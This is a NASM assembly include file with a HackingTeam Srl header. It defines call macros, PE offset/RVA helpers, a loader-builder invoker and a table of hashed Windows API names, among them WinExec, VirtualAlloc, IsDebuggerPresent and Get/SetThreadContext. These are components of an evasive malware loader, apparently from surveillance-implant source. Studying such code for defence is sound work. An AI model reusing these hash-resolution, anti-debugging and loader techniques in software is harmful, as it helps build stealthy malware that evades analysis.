; *****************************************************************************
; * HackingTeam Srl
; * Via Moscova, 13
; * 20121, Milan { Italy }
; *****************************************************************************
; * Compile with NASM
; *		* ELF
;		* COFF
; *****************************************************************************
; MACRO

;HANDLE CreateFile(
;
;    LPCTSTR lpFileName,	// pointer to name of the file 
;    DWORD dwDesiredAccess,	// access (read-write) mode 
;    DWORD dwShareMode,	// share mode 
;    LPSECURITY_ATTRIBUTES lpSecurityAttributes,	// pointer to security attributes 
;    DWORD dwCreationDistribution,	// how to create 
;    DWORD dwFlagsAndAttributes,	// file attributes 
;    HANDLE hTemplateFile 	// handle to file with attributes to copy  
;   );	
 
%macro INVOKE_CreateFileA 8
	push %8
	push %7
	push %6
	push %5
	push %4
	push %3
	push %2
	call %1
%endm

%macro _api_getAddr 3								;	%macro _api_getAddr 4
	push %3											; push %4
	lea eax, [esi+%1]								; lea eax, [esi+%2]
	push eax										; push eax
	push dword [esi+@KernelBase]					; push dword [esi+@KernelBase]
	push esi										; push esi
	seh_call secure_call_handler, get_proc_address, esi	; seh_call call_handler, get_proc_address, esi
	mov [esi+%2], eax								; mov [esi+%3], eax
%endm

%macro INVOKE_OFFSET_TO_RVA 2
	push %2
	push %1
	%ifdef __LINUX__
		call OffsetToRva
	%else
		call _OffsetToRva@8
	%endif
%endm

%macro INVOKE_RVA_TO_OFFSET 2
	push %2
	push %1
	%ifdef __LINUX__
		call RvaToOffset
	%else
		call _RvaToOffset@8
	%endif
%endm

%macro INVOKE_BUILD1LOADER 3
	push %3
	push %2
	push %1
	%ifdef __LINUX__
		call Build1Loader
	%else
		call _Build1Loader@12
	%endif
	
%endm

%macro INVOKE_INTERVALRAND 2
	push %2
	push %1
	%ifdef __LINUX__
		call IntervalRand
	%else
		 call _IntervalRand@8
	%endif
%endm

; *****************************************************************************
;
;  Hacker Disassembler Engine
;  Copyright (c) 2006-2007 Veacheslav Patkov.
;  aLL rights reserved.
;

%macro globals 1-2
    %if %0 == 1
        global %1
        global _%1
        %1:
        _%1:
    %else
        global %1
        global %1@%2
        global _%1
        global _%1@%2
        %1:
        %1@%2:
        _%1:
        _%1@%2:
    %endif
%endmacro
; *****************************************************************************

; *****************************************************************************
; *
; *****************************************************************************

%macro LOCAL_api_getAddr 3								;	%macro _api_getAddr 4
;	mov eax, %1
;	push eax
;	lea eax, [esi+%2]
;	push eax
;	seh_call call_handler, decrypt_string, esi

	push %3											; push %4
	;mov eax, %1									; mov eax, %1
	;push eax										; push eax
	lea eax, [%1]								; lea eax, [esi+%2]
	push eax										; push eax
	push dword [esi+@KernelBase]					; push dword [esi+@KernelBase]
	push esi										; push esi
	seh_call secure_call_handler, get_proc_address, esi	; seh_call call_handler, get_proc_address, esi
	mov [%2], eax								; mov [esi+%3], eax
%endm

HASH_CreateFileA					equ 0EB96C5FAh
HASH_CreateFileW					equ 0EB96C610h
HASH_CreateDirectory				equ 041FABFEFh
HASH_CloseHandle					equ 03870CA07h
HASH_SetFilePointer					equ 053EF6BF2h
HASH_WriteFile						equ 0663CECB0h
HASH_ReadFile						equ 071019921h
HASH_GetModuleFileName				equ 013B8A14Dh
HASH_GetModuleFileNameW				equ 013B8A163h
HASH_VirtualAlloc					equ 0382C0F97h
HASH_VirtualFree					equ 0668FCF2Eh
HASH_WinExec						equ 029A65678h
HASH_LoadLibrary					equ 05FBFF0FBh
HASH_FreeLibrary					equ 030EECE3Ch
HASH_ExitProcess					equ 0B769339Eh
HASH_IsDebuggerPresent				equ 0E6A24847h
HASH_DebugActiveProcess				equ 0E26E6467h
HASH_GetCurrentProcessID		 	equ 0A3BF64B4h
HASH_GetProcAddress					equ 0CF31BB1Fh
HASH_GetEnvironmentVariable			equ 087889701h
HASH_GetCommandLineA				equ 0B511FC4Dh
HASH_CreateThread					equ 07F08F5B9h
HASH_GetThreadContext				equ 0EBA2CFC2h
HASH_SetThreadContext				equ 07E20964Eh
HASH_GetFileSize					equ 07891C520h

; Write an PUSH16 opcode
%macro PUSH_imm16 1
	   db 66h
	   db 68h
	   dw %1
	   sub esp, 2
	   shr dword [esp], 10h
%endm
